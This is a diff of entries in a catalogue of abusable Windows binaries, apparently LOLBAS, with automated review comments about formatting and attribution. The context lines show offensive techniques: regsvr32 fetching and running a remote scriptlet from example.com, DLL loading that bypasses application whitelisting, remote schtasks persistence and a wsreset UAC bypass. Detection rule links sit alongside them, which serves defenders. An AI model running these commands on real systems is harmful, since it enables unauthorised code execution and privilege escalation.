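Review bot: since this hunk is a wording-normalization pass on the msdt command, the adjacent unchanged `Usecase: Execute code bypass Application whitelisting` should get the same treatment; it is missing a conjunction and uses inconsistent capitalization, so `Execute code, bypassing application whitelisting` would match the other AWL Bypass entries.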
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
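Review bot: the Acknowledgement block here has both `Person:` and `Handle:` empty, which serializes to a list containing one all-null entry; that is indistinguishable from a data-entry mistake and will render as a blank credit. Either fill in the contributor or remove the empty item and leave `Acknowledgement:` with an empty list.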
| @@ -69,4 +69,3 @@ Acknowledgement: | ||||
|     Handle: '@subtee' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -51,4 +51,3 @@ Acknowledgement: | ||||
|     Handle: '@netbiosX' | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
|   | ||||
| @@ -34,4 +34,3 @@ Acknowledgement: | ||||
|     Handle: | ||||
|   - Person: 'Xabier Ugarte-Pedrero' | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Acknowledgement: | ||||
|     Handle: '@subtee' | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -19,4 +19,3 @@ Detection: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -21,4 +21,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -38,4 +38,3 @@ Acknowledgement: | ||||
|     Handle: '@kylehanslovan' | ||||
|   - Person: Fab | ||||
|     Handle: '@0rbz_' | ||||
| --- | ||||
|   | ||||
| @@ -22,4 +22,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -31,4 +31,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Derek Johnson | ||||
|     Handle: '' | ||||
| --- | ||||
|   | ||||
| @@ -13,7 +13,7 @@ Commands: | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\system32\pnputil.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml | ||||
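Review bot: the trailing-space fix on `Code_Sample:` is fine, but the context line `OperatingSystem: Windows 10,7` two lines above uses the same non-standard format that appears in the ilasm entry; while normalizing whitespace in this file, change it to `Windows 7, Windows 10` so the value parses like the others.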
| @@ -22,4 +22,3 @@ Acknowledgement: | ||||
|     Handle: '@LuxNoBulIshit' | ||||
|   - Person: Avihay eldad | ||||
|     Handle: '@aloneliassaf' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -40,4 +40,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -28,4 +28,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Leon Rodenko | ||||
|     Handle: '@L3m0nada' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: FireEye | ||||
|     Handle: '@FireEye' | ||||
| --- | ||||
|   | ||||
| @@ -41,4 +41,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Grzegorz Tworek | ||||
|     Handle: '@0gtweet' | ||||
| --- | ||||
| @@ -36,4 +36,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: regasm.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -38,4 +38,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Eli Salem | ||||
|     Handle: '@elisalem9' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
|   | ||||
| @@ -14,7 +14,7 @@ Commands: | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -34,4 +34,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -7,14 +7,14 @@ Commands: | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| @@ -36,7 +36,7 @@ Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code_Sample: | ||||
|  - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml | ||||
| @@ -57,4 +57,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -32,4 +32,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: elceef | ||||
|     Handle: '@elceef' | ||||
| --- | ||||
|   | ||||
| @@ -39,4 +39,3 @@ Acknowledgement: | ||||
|     Handle: '@splinter_code' | ||||
|   - Person: ap | ||||
|     Handle: '@decoder_it' | ||||
| --- | ||||
|   | ||||
| @@ -91,4 +91,3 @@ Acknowledgement: | ||||
|     Handle: '@404death' | ||||
|   - Person: Martin Ingesen | ||||
|     Handle: '@Mrtn9' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Runonce.exe | ||||
| Description: | ||||
| Description: Executes a Run Once Task that has been configured in the registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -27,4 +27,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Runscripthelper.exe | ||||
| Description: | ||||
| Description: Execute target PowerShell script | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
| @@ -18,7 +18,7 @@ Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Event 4014 - Powershell logging | ||||
|   - IOC: Event 400 | ||||
| Resources: | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -36,4 +36,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
|   | ||||
| @@ -11,7 +11,7 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1053.005 | ||||
|     OperatingSystem: Windows | ||||
|   - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily  | ||||
|   - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily | ||||
|     Description: Create a scheduled task on a remote computer for persistence/lateral movement | ||||
|     Usecase: Create a remote task to run daily relative to the the time of creation | ||||
|     Category: Execute | ||||
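Review bot: the unchanged line `Usecase: Create a remote task to run daily relative to the the time of creation` directly under the whitespace fix has a doubled "the"; since the hunk already touches this command block, fold the typo fix in rather than leaving it for another pass.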
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
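Review bot: as with the msdt entry, this Acknowledgement block contains an item whose `Person:` and `Handle:` are both empty, producing a null credit in the rendered page; either attribute the schtasks entry or drop the empty item so that the list is genuinely empty rather than populated with a placeholder.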
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Scriptrunner.exe | ||||
| Description: | ||||
| Description: Execute binary through proxy binary to evade defensive counter measures | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
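Review bot: `Description: Execute binary through proxy binary to evade defensive counter measures` is a Usecase sentence, not a description of Scriptrunner.exe; it also spells the compound as two words ("counter measures"). The summary field should say what the tool is for legitimately and leave the evasion wording to the command-level `Usecase`, as the Verclsid.exe entry in this same change does.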
| @@ -33,4 +33,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@nicktyrer' | ||||
| --- | ||||
|   | ||||
| @@ -31,4 +31,3 @@ Acknowledgement: | ||||
|     Handle: '@hexacorn' | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -22,4 +22,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Eral4m | ||||
|     Handle: '@eral4m' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Landers | ||||
|     Handle: '@monoxgas' | ||||
| --- | ||||
|   | ||||
| @@ -35,4 +35,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: Maxime Nadeau | ||||
|     Handle: '@m_nad0' | ||||
| --- | ||||
|   | ||||
| @@ -37,4 +37,3 @@ Acknowledgement: | ||||
|     Handle: '@oulusoyum' | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
|   | ||||
| @@ -22,13 +22,12 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe | ||||
| Code_Sample: | ||||
|    - Code: | ||||
|   - Code: | ||||
| Detection: | ||||
|    - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml | ||||
|    - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml | ||||
| Acknowledgement: | ||||
|   - Person: Lior Adar | ||||
|     Handle: | ||||
|   - Person: Hai Vaknin(Lux) | ||||
|     Handle: | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Verclsid.exe | ||||
| Description: | ||||
| Description: Used to verify a COM object before it is instantiated by Windows Explorer | ||||
| Author: '@bohops' | ||||
| Created: 2018-12-04 | ||||
| Commands: | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@NickTyrer' | ||||
| --- | ||||
|   | ||||
| @@ -25,4 +25,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
|   | ||||
| @@ -30,4 +30,3 @@ Acknowledgement: | ||||
|     Handle: '@Oddvarmoe' | ||||
|   - Person: Freddy | ||||
|     Handle: '@falsneg' | ||||
| --- | ||||
|   | ||||
| @@ -88,4 +88,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
|   | ||||
| @@ -24,4 +24,3 @@ Acknowledgement: | ||||
|     Handle: '@YoSignals' | ||||
|   - Person: Elliot Killick | ||||
|     Handle: '@elliotkillick' | ||||
| --- | ||||
|   | ||||
| @@ -31,7 +31,7 @@ Detection: | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml | ||||
|   - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml | ||||
|   - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules  | ||||
|   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||||
|   - IOC: Wscript.exe executing code from alternate data streams | ||||
|   - IOC: DotNet CLR libraries loaded into wscript.exe | ||||
|   - IOC: DotNet CLR Usage Log - wscript.exe.log | ||||
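Review bot: whitespace-only change (trailing space stripped from the BlockRule URL); since the same trailing-space fix appears again in the wuauclt hunk, a trailing-whitespace lint in CI would prevent these from coming back.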
| @@ -42,4 +42,3 @@ Acknowledgement: | ||||
|     Handle: '@oddvarmoe' | ||||
|   - Person: SaiLay(valen) | ||||
|     Handle: '@404death' | ||||
| --- | ||||
|   | ||||
| @@ -7,7 +7,7 @@ Commands: | ||||
|   - Command: wsreset.exe | ||||
|     Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Category: UAC Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 10 | ||||
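Review bot: changing `Category: UAC bypass` to `UAC Bypass` normalises a value that is presumably used to group entries, so case drift here silently splits a category; suggest enforcing the allowed Category values in the repository's validation so this cannot recur.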
| @@ -31,4 +31,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: Hashim Jawad | ||||
|     Handle: '@ihack4falafel' | ||||
| --- | ||||
|   | ||||
| @@ -18,7 +18,7 @@ Code_Sample: | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml  | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml | ||||
|   - IOC: wuauclt run with a parameter of a DLL path | ||||
|   - IOC: Suspicious wuauclt Internet/network connections | ||||
| Resources: | ||||
| @@ -26,4 +26,3 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: David Middlehurst | ||||
|     Handle: '@dtmsecurity' | ||||
| --- | ||||
|   | ||||
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Xwizard.exe | ||||
| Description: | ||||
| Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe | ||||
| Author: 'Oddvar Moe' | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
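Review bot: the supplied Description names both behaviours of the entry (executing a registered custom class and downloading a file), which is what the previously empty field needed; minor style point, `Author: 'Oddvar Moe'` is quoted where the Advpack hunk leaves `Author: LOLBAS Team` unquoted, so pick one convention.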
| @@ -50,4 +50,3 @@ Acknowledgement: | ||||
|     Handle: '@harr0ey' | ||||
|   - Person: Wade Hickey | ||||
|     Handle: '@notwhickey' | ||||
| --- | ||||
|   | ||||
| @@ -1,7 +1,7 @@ | ||||
| --- | ||||
| Name: Advpack.dll | ||||
| Description: Utility for installing software and drivers with rundll32.exe | ||||
| Author: | ||||
| Author: LOLBAS Team | ||||
| Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, | ||||
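Review bot: filling the empty `Author` with `LOLBAS Team` is reasonable when the original contributor is unknown, but say so in the commit message so it is not read as a real attribution, especially since `Created: 2018-05-25` is kept and now reads as the date the team authored the entry.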
| @@ -62,4 +62,3 @@ Acknowledgement: | ||||
|     Handle: '@moriarty_meng' | ||||
|   - Person: Nick Carr (Threat Intel) | ||||
|     Handle: '@ItsReallyNick' | ||||
| --- | ||||
|   | ||||
Some files were not shown because too many files have changed in this diff.